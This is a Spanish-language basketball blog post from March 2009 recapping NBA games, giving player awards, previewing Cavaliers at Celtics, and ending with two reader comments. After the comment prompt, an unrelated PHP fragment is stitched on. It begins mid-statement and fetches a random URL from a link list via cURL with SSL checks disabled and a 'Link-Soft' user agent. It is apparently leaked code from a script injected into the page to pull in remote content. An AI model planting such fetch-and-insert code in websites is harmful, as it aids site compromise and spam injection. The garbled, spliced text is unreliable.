La crónica (5/03/2009)

06 de March de 2009 por MagicJohnson32

cpmavs

Por TheDeerHunter & MagicJohnson32

Como cada jueves, anoche hubo pocos partidos pero con mucha miga para analizar.

Bromeábamos ayer con la conveniencia para Jason Kidd de simular una lesión y quedarse en casita, a fin de evitar el mal trago que supone enfrentarse a CP3. El tiempo no pasa en balde para nadie, ni siquiera para uno de los más grandes como lo ha sido Kidd. Nos quedaremos con las ganas de asistir a ese duelo con un Kidd más joven, con lo gran defensor que fue. Nos conformaremos con simularlo en nuestras mentes y en nuestras videoconsolas. Anoche, el baño no lo pudo evitar de ninguna de las formas pero al menos cumplió, cosa que no pueden decir alguno de sus compañeros en la clara derrota encajada en New Orleans.

Llama la atención el 11-11 de Chandler que promedia desde su frustrado traspaso a Oklahoma. No está mal para ser un jugador rechazado por supuestos problemas físicos. Sus compañeros les han dedicado al departamento médico de los Thunder su 6ª victoria consecutiva desde aquello.

En Denver, el eterno “enfant terrible” Melo volvía a pedir su enésima redención tras el desbarre de hace dos partidos. No sabemos si debía ganarse el perdón del público, de Karl o de sus compañeros, pero pensamos que su extraordinaria actuación anotadora en el triunfo sobre los Blazers logró más lo primero que lo segundo o lo tercero. Despreciar a su propio equipo es lo último que puede hacer un líder. A estas alturas dudamos mucho que Melo pueda llegar a serlo algún día: todo el mundo termina cansándose de perdonar y perdonar… Por parte de Portland, la defensa de la que tanto gusta sacar pecho McMillan fue directamente de risa, billupsmeloy no creemos que influyera demasiado Sergio, que sólo jugó 7 minutos. Rudy, correcto sin más.

PREMIOS

MVP: Nuestros pronósticos de ayer, cualquier cosa excepto arriesgados, se cumplieron. Paul lideró una nueva victoria de los Hornets con 27 puntos y 15 asistencias, mientras que Melo protagonizó una exhibición anotadora con 38 puntos y un 16 de 26 en tiros de campo.

El rookie: En una noche de escasísimo protagonismo por parte de los debutantes, los 11 puntos de Rudy son suficientes para convertirlo en el más destacado.

La sorpresa: Más que una sorpresa, se trata de un dato curioso y significativo, el de las asistencias repartidas anoche por los Mavs (12) en comparación con las que dio Chris Paul (15). No se pierdan el vídeo con las mejores jugadas de CP3, incluyendo un caño a Jason Terry (y, sobre todo, no se pierdan la posterior expresión de Mark Cuban).

La decepción: Los Mavs, en general, con la habitual excepción de un Nowitzki que sostuvo a su equipo durante los tres primeros cuartos. Al final la balanza se decantó claramente del lado local, algo inevitable viendo las paupérrimas aportaciones de los compañeros de Robin Hood.

El mayor esfuerzo en vano: Lo dicho. Dirk Nowitzki lo intentó durante tres cuartos, en los que anotó 27 puntos. Pero nadie le acompañó y los Hornets acabaron pasando por encima de los Mavs.

RAZONES PARA TRASNOCHAR

Esta próxima madrugada, pese a que hay 10 partidos y muchos focos de interés, no tenemos duda de cuál es el partido más destacado.

LbjppCavs @ Celtics (2:00 h. GMT+1). El dato es claro: los 14 últimos enfrentamientos entre Cavaliers y Celtics los ha ganado el equipo que jugaba como local. La ventaja de campo se antoja decisiva en los Playoffs del Este, que este año parecen destinados a vivir una final entre estos dos equipos. Un triunfo hoy de los Cavs dejaría a los Celtics con tres derrotas más, una diferencia tal vez insalvable visto el gran nivel al que se encuentran LeBron & Co. La ausencia de Garnett por séptimo partido consecutivo complica aún más las cosas para los vigentes campeones.

El jugador al que recomendamos prestar una especial atención es… Yao Ming. Los Rockets, que han perdido la cuarta plaza del Oeste en favor de los Hornets, reciben a los Suns, novenos  y que apuran sus opciones de meterse en Playoffs. Sobre Yao recae la responsabilidad de liderar a los suyos y de frenar al mejor Shaq de los últimos años, el día en que O’Neal cumple 37 años.

La pregunta del día: ¿Crees que la ventaja de campo determinará el Campeón del Este?

Comenta

2 comentarios a esta entrada

  1. xapa_croack dice:
    #1

    El campeon del este no creo que determinara la ventaja de campo, pero si en la final.

      Citar

  2. Miguel dice:
    #2

    Viendo como esta el panorama en el Este hay que jugarselo todo por quedar primero, porque el segundo se enfrentaria en primera ronda con Sixers/Pistons, en segunda ronda contra Magic y llegar muy mermados a la final de conferencia

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>